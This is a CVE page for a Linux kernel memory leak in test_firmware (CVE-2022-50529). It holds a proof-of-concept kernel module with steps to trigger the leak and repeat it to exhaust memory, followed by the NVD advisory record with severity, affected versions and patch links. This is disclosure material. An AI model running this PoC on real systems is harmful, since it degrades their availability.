CVE-2022-50529

// PoC for CVE-2022-50529 - Linux Kernel test_firmware memory leak // This PoC demonstrates how to trigger the memory leak by causing // misc_register() to fail in test_firmware_init() #include <linux/module.h> #include <linux/init.h> #include <linux/fs.h> #include <linux/miscdevice.h> // Pre-occupy the misc device number that test_firmware uses // to cause misc_register() to fail in test_firmware_init() static struct miscdevice my_misc_dev = { .minor = MISC_DYNAMIC_MINOR, // Use same minor number .name = "test_firmware", // Same name to cause conflict .fops = NULL, }; static int __init poc_init(void) { int ret; // Register a misc device with the same name to occupy the slot // This will cause test_firmware's misc_register() to fail ret = misc_register(&my_misc_dev); if (ret) { pr_err("Failed to register blocking device: %d\n", ret); return ret; } pr_info("PoC loaded - test_firmware misc_register will fail\n"); pr_info("Now loading test_firmware module will leak memory\n"); return 0; } static void __exit poc_exit(void) { misc_deregister(&my_misc_dev); pr_info("PoC unloaded\n"); } module_init(poc_init); module_exit(poc_exit); MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Researcher"); MODULE_DESCRIPTION("PoC for CVE-2022-50529 test_firmware memory leak"); // Steps to reproduce: // 1. Load this PoC module first: insmod poc_module.ko // 2. Then try to load test_firmware: insmod test_firmware.ko // 3. misc_register() will fail because the name is already taken // 4. Check kernel log for memory leak warning: // unreferenced object 0xffff88810a34cb00 (size 32) // 5. Repeat steps 2 to amplify the memory leak

{"cve": {"id": "CVE-2022-50529", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:36.883", "lastModified": "2026-03-17T16:57:47.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntest_firmware: fix memory leak in test_firmware_init()\n\nWhen misc_register() failed in test_firmware_init(), the memory pointed\nby test_fw_config->name is not released. The memory leak information is\nas follows:\nunreferenced object 0xffff88810a34cb00 (size 32):\n comm \"insmod\", pid 7952, jiffies 4294948236 (age 49.060s)\n hex dump (first 32 bytes):\n 74 65 73 74 2d 66 69 72 6d 77 61 72 65 2e 62 69 test-firmware.bi\n 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 n...............\n backtrace:\n [<ffffffff81b21fcb>] __kmalloc_node_track_caller+0x4b/0xc0\n [<ffffffff81affb96>] kstrndup+0x46/0xc0\n [<ffffffffa0403a49>] __test_firmware_config_init+0x29/0x380 [test_firmware]\n [<ffffffffa040f068>] 0xffffffffa040f068\n [<ffffffff81002c41>] do_one_initcall+0x141/0x780\n [<ffffffff816a72c3>] do_init_module+0x1c3/0x630\n [<ffffffff816adb9e>] load_module+0x623e/0x76a0\n [<ffffffff816af471>] __do_sys_finit_module+0x181/0x240\n [<ffffffff89978f99>] do_syscall_64+0x39/0xb0\n [<ffffffff89a0008b>] entry_SYSCALL_64_after_hwframe+0x63/0xcd"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.14", "versionEndExcluding": "4.14.303", "matchCriteriaId": "E245BC6C-44BD-47D1-A03D-9FE1F29BB25A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.270", "matchCriteriaId": "AE8904A3-99BE-4E49-9682-1F90A6373F4F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.229", "matchCriteriaId": "A0C0D95E-414A-445E-941B-3EF6A4D3A093"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.163", "matchCriteriaId": "D05D31FC-BD74-4F9E-B1D8-9CED62BE6F65"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.86", "matchCriteriaId": "47237296-55D1-4ED4-8075-D00FC85A61EE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/04dd47a2e169f2d4489636afa07ff0469aab49ab", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/0b5a89e8bce1ea43687742b4de8e216189ff94ac", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/357379d504c0c8b0834e206ad8c49e4b3c98ed4d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/628de998a3abfffb3f9677d2fb39a1d5dcb32fdb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6dd5fbd243f19f087dc79481acb7d69fb57fea2c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7610615e8cdb3f6f5bbd9d8e7a5d8a63e3cabf2e", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8d8c1d6a430f0aadb80036e2b1bc0a05f9fad247", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ed5cbafaf7ce8b86f19998c00eb020c8d49b017f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}